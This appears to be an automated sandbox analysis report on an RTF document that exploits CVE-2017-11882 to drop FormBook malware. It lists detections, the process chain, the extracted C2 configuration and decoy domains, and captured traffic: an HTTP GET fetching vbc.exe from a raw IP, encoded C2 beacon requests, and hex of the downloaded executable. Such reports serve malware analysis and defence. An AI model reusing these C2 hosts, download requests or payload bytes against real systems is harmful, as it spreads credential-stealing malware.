Windows Analysis Report 3nkW4MtwSD

AV Detection:

Found malware configuration

Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Multi AV Scanner detection for submitted file

Source: 3nkW4MtwSD.rtf

Virustotal: Detection: 56%

Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: 3nkW4MtwSD.rtf

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Antivirus or Machine Learning detection for unpacked file

Source: 4.0.vbc.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.mountfrenchlodge.net

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		4_2_00407B1A
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		4_2_0040E460
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop edi		6_2_000CE460
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop ebx		6_2_000C7B1B

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.cuteprofessionalscrubs.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mountfrenchlodge.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cuteprofessionalscrubs.com/9gr5/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.46.199.153 198.46.199.153

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 16:23:57 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 02:23:58 GMTETag: "b4a00-5d193aabff887"Accept-Ranges: bytesContent-Length: 739840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.199.153

Found strings which match to known social media urls

Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.456132086.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpg
Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&
Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.mountfrenchlodge.net

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive
